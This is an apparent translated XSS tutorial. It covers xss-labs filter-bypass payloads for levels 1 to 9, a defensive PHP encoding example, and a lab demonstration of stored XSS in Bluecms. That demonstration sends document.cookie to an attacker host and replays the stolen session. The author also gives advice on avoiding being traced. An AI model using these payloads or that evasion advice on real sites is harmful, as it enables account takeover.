Foreword
XSS (Cross-Site Scripting) takes its name from cross-site scripting, but the emphasis is not on the "cross-site" part; it is on the execution of the script. XSS is a security vulnerability that frequently appears in web applications, caused by the application insufficiently filtering user-generated input.
Types
There are three common kinds of XSS: reflected XSS, stored XSS and DOM-based XSS. This article tests the reflected and stored types.
0x01 Reflected
The figure shows the principle of reflected XSS, the most common type. The user visits the server through a cross-site link, the cross-site code is returned in the response, and the output script is not stored in a database.
0x02 Stored
Stored XSS is persistent: the code is stored on the server, for example in personal profile fields or published articles. If the input is not filtered, or filtered loosely, the code is saved on the server and executes every time a user accesses the page. This kind of XSS is more dangerous and can lead to worms and cookie theft.
In actual penetration tests the biggest use of XSS is obtaining the administrator's cookie. XSS can of course do much more, such as creating new users or writing a webshell, but these are usually hard to pull off: first you need the administrator's cookie, then creating a user requires knowing the page and parameters of that function and making sure no CAPTCHA mechanism is in the way; writing a webshell likewise requires knowing the upload or edit points and their parameters, with no security software or other external factors interfering. In practice things are rarely that smooth.
XSS Challenge Tour
Before we start, let's do a few small XSS problems to get a feel for it.
1x01 level1
The first level splices the input directly into the page without any filtering, so arbitrary tags are executed.
Payload:
<script>alert(1)</script>
1x02 level2
Observe the source:
Using the script tag directly no longer pops an alert: the input lands in the value attribute of an input tag, wrapped in double quotes, so the payload is treated as text and cannot execute. We need a way to break out of the attribute.
Payload:
1"><script>alert(/wu/)</script>
First close the double quotes, then close the input tag with >; execution succeeds.
1x03 level3
Observe the source code:
The source passes the input tag's value through htmlspecialchars(), which escapes angle brackets and similar special characters. That means <> can no longer be used, so consider bypassing with an on event.
First try a single quote in the value; see the figure below:
The on event does not pop: since > is escaped as well, the input tag is not closed, and the payload cannot execute on its own because the rest of the input tag follows the event attribute. But we can use // to comment out the remainder of the input tag.
Payload:
1' onclick=alert(/wupan/)//
Clicking triggers the event and the alert pops.
1x04 level4
Observe the source:
> and < are filtered, so HTML tags can no longer break out, but on events are not filtered. The only difference from level3 is that the single quotes around the value have become double quotes.
Payload:
" onmouseover=alert(/wu/)
Here the onmouseover event is used; moving the mouse into the input box triggers it. It can also be triggered by clicking with onclick, as in level3.
1x05 level5
Observe the source:
First strtolower() lowercases the submitted value, which defeats mixed-case bypasses; then a regex filters <script and on, so neither the script tag nor on events can be used. However, the a tag is not filtered.
Payload:
"> <a href='javascript:alert(1)'>
The a tag defines a hyperlink from one page to another; click the link.
The alert pops.
1x06 level6
Observe the source:
<script, on, src, data and href are filtered, but there is no case normalisation, so mixed case can bypass the filter.
Payload:
"><a HREF=" javascript:alert(1)" //
1x07 level7
Observe the source:
script, on, src, data and href are deleted by regex, and before the keyword filter the input is converted to lowercase; a double-write bypass works.
Payload:
"><a hrhrefef="javassrccript:alert(1)">//
" oonnclick=alert(1)//
The alert pops.
1x08 level8
Observe the source:
This one is a little nastier: first a case filter, then a regex filter that strips script, on, src, data, href and double quotes, followed by htmlspecialchars() on the input to escape dangerous characters, so none of the tricks above work. However, where the keyword is referenced a second time, inside an a tag, it is not passed through htmlspecialchars().
Looking more closely at the source code, the page's text box adds a link, so the href attribute is present regardless; we only need to HTML-entity-encode "script" to bypass the filter.
Payload:
javascript:alert(1)
Click the hyperlink; the alert pops.
1x09 level9
Observe the source:
The filtering rules are the same as level8: the second reference to the keyword, inside the a tag, is not filtered with htmlspecialchars(). Compared with level8 there is an extra check for http://, so the payload must contain http://.
Payload:
javascript:alert(1)//http://www.baidu.com
Click "Links"; the alert pops.
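Levels 3 to 9 all fail the same way: the filter blacklists keywords or escapes only some characters in some contexts. As an added defensive example (not code from xss-labs or Bluecms), the PHP below encodes attribute values with ENT_QUOTES and allowlists the href scheme after entity-decoding; the inputs are the payloads from the levels above, so the double-write, case and entity tricks can be seen failing against it.

```php
<?php
// Added defensive example: context-aware output encoding plus an href scheme
// allowlist, in place of the keyword blacklist used by level5 to level7.

// Encode for an HTML attribute value or text node. ENT_QUOTES escapes both
// ' and ", which is what level3 (single quotes) and level4 (double quotes) lacked.
function encodeHtml(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow only http(s) and relative URLs in href. Entity-decode first so an
// entity-encoded javascript: (the level8 trick) is seen for what it is, then
// remove control characters the browser would ignore before the colon.
function safeHref(string $url): string {
    $decoded = html_entity_decode($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $clean   = preg_replace('/[\x00-\x1f\x7f]/', '', ltrim($decoded));
    if (preg_match('#^([a-z][a-z0-9+.-]*):#i', $clean, $m)) {
        if (!in_array(strtolower($m[1]), ['http', 'https'], true)) {
            return '#'; // any other scheme (javascript:, data:, ...) is dropped
        }
    }
    return encodeHtml($clean);
}

// Constructed inputs, taken from the payloads discussed in the walkthrough.
$cases = [
    "1' onclick=alert(/wupan/)//",
    '" onmouseover=alert(/wu/)',
    '"><a HREF=" javascript:alert(1)" //',
    '"><a hrhrefef="javassrccript:alert(1)">//',
    'javascript:alert(1)//http://www.baidu.com',
    '&#106;avascript:alert(1)',
    'https://example.com/page?q=1&x=2',   // legitimate link stays usable
];

foreach ($cases as $c) {
    // Same input rendered in the two contexts the levels use: attribute and href.
    echo '<input value="', encodeHtml($c), '">', "\n";
    echo '<a href="', safeHref($c), '">link</a>', "\n";
}
```

Run it with php and inspect the output: every quote and angle bracket in the value attribute is an entity, the javascript: links become "#", and only the https URL survives as a working link.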
Alright, on to the main part!
2x01
Same old setup: a LAMP environment, using phpstudy directly to save effort. One of the most common and most powerful uses of XSS is cookie theft; the open source CMS Bluecms is used as the example to demonstrate the attack.
2x02
Bluecms has a stored XSS: the URL is /admin/user.php, where the address parameter is output without HTML encoding, resulting in stored XSS.
The red box marks the XSS injection point.
Create a test account, username: 11, password: 11.
2x03
Create a dynamic PHP script on the VPS. The script redirects to Baidu and assigns the cookie parameter to a variable; it then records the IP and time, creates a cookie file and writes the cookie information into it.
2x04
Enter the payload at the injection point:
"/><script>window.open('*******/xss.php?cookie='+document.cookie)</script>   ***** is the VPS domain
Since there was a problem with the VPS, it could not be submitted. Also, because the payload must contain the personal VPS address, even if the endpoint is hidden after the trigger it may still be traceable to the real identity. For safety, we use an open source XSS platform instead.
2x05
Create a new project on the open source XSS platform; the payload is submitted through the platform, which avoids exposing our own address.
Use the platform's default module and tick keepsession.
The platform then generates the payload automatically.
2x06
Enter the generated payload at the injection point and submit.
2x07
Click Edit to trigger the XSS.
The page looks unchanged after triggering, but the cookie information has already been sent to the platform.
2x08
Return to the XSS platform to view the cookie:
the cookie has been captured.
2x09
Use the cookie to log in without a username or password.
Open a new URL,
fill the captured cookie into the red box,
and refresh.
Success.
2x10
Now let's look at the database:
the payload is sitting in the database. If a personal VPS had been used, its address would be exposed here; the administrator reports it, the police trace the VPS address to you, and, congratulations, you are in a hole.
Done.